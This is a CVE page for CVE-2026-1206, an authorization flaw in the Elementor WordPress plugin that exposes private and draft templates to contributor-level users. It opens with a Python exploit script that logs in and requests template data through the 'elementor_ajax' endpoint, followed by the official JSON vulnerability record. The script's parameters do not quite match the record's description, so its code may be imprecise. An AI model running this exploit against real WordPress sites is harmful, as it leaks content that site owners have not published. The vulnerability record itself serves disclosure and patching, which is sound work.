CVE-2026-1206

import requests # Configuration target_url = "http://example.com/wp-admin/admin-ajax.php" username = "contributor_user" password = "user_password" template_id = "123" # The ID of the private/draft template to retrieve # 1. Login to get authenticated cookies login_url = target_url.replace('admin-ajax.php', 'wp-login.php') session = requests.Session() payload = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url } session.post(login_url, data=payload) # 2. Exploit the vulnerability # The vulnerability is in the 'get_template_data' action of 'elementor_ajax' exploit_data = { 'action': 'elementor_ajax', 'actions': '{{"get_template_data": {{"editor_post_id": {}}}, "source": "local"}}'.format(template_id) } # Note: Elementor often expects a specific JSON structure for actions # Depending on exact Elementor version, parameters might vary slightly. # The core issue is sending the template_id without edit perms. response = session.post(target_url, data=exploit_data) if response.status_code == 200: print("Response received:") print(response.text) else: print("Failed to send request")

{"cve": {"id": "CVE-2026-1206", "sourceIdentifier": "[email protected]", "published": "2026-03-26T06:16:09.267", "lastModified": "2026-04-24T16:35:20.070", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Elementor Website Builder plugin for WordPress is vulnerable to Incorrect Authorization to Sensitive Information Exposure in all versions up to, and including, 3.35.7. This is due to a logic error in the is_allowed_to_read_template() function permission check that treats non-published templates as readable without verifying edit capabilities. This makes it possible for authenticated attackers, with contributor-level access and above, to read private or draft Elementor template content via the 'template_id' supplied to the 'get_template_data' action of the 'elementor_ajax' endpoint."}, {"lang": "es", "value": "El plugin Elementor Website Builder para WordPress es vulnerable a una Autorización Incorrecta que conduce a la Exposición de Información Sensible en todas las versiones hasta la 3.35.7, inclusive. Esto se debe a un error de lógica en la verificación de permisos de la función is_allowed_to_read_template() que trata las plantillas no publicadas como legibles sin verificar las capacidades de edición. Esto hace posible que atacantes autenticados, con acceso de nivel de colaborador y superior, lean contenido de plantillas privadas o en borrador de Elementor a través del 'template_id' proporcionado a la acción 'get_template_data' del endpoint 'elementor_ajax'."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3489160/elementor/trunk/includes/template-library/sources/local.php?old=3473768&old_path=elementor%2Ftrunk%2Fincludes%2Ftemplate-library%2Fsources%2Flocal.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a4420935-4952-4460-afc2-1c6df6965b3d?source=cve", "source": "[email protected]"}]}}